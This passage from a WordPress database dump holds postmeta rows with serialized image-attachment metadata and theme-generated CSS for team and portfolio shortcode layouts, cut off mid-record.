(20599,3269,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:617;s:6:\"height\";i:470;s:4:\"file\";s:18:\"2022/11/w21m-1.jpg\";s:8:\"filesize\";i:248080;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"w21m-1-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20379;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"w21m-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8716;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"w21m-1-500x381.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41704;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20600,3266,'the7_shortcodes_dynamic_css','a:2:{s:32:\"e88fc4f0dad5d577a43cdb76635deb8b\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-e88fc4f0dad5d577a43cdb76635deb8b.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(20601,2763,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:10:\"w114-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"w114-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4481;}}'),
(20602,2766,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:10:\"w111-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"w111-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5974;}}'),
(20603,2765,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:10:\"w112-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"w112-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4868;}s:18:\"full-1668034832400\";a:3:{s:5:\"width\";i:120;s:6:\"height\";i:180;s:4:\"file\";s:25:\"w112-1-e1668034819353.jpg\";}s:23:\"thumbnail-1668034832400\";a:5:{s:4:\"file\";s:33:\"w112-1-e1668034819353-120x150.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3969;}s:18:\"full-1668034975644\";a:3:{s:5:\"width\";i:107;s:6:\"height\";i:160;s:4:\"file\";s:25:\"w112-1-e1668034832400.jpg\";}s:23:\"thumbnail-1668034975644\";a:5:{s:4:\"file\";s:33:\"w112-1-e1668034832400-107x150.jpg\";s:5:\"width\";i:107;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3568;}}'),
(20604,2764,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:10:\"w113-1.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"w113-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4325;}}'),
(20605,2748,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:8:\"w112.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"w112-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5006;}}'),
(20606,2748,'dt-img-hide-title','0'),
(20607,3274,'_wp_attached_file','2022/11/Egypt2-e1668179241642.jpg'),
(20608,3274,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:350;s:4:\"file\";s:33:\"2022/11/Egypt2-e1668179241642.jpg\";s:8:\"filesize\";i:615976;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"Egypt2-e1668179241642-300x55.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:55;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2813;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"Egypt2-e1668179241642-1024x187.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17100;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Egypt2-e1668179241642-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3344;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"Egypt2-e1668179241642-768x140.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10455;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"Egypt2-e1668179241642-1536x280.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37133;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:32:\"Egypt2-e1668179241642-500x91.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:91;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5532;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:33:\"Egypt2-e1668179241642-800x146.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:146;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11293;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:34:\"Egypt2-e1668179241642-1280x233.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26301;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"sh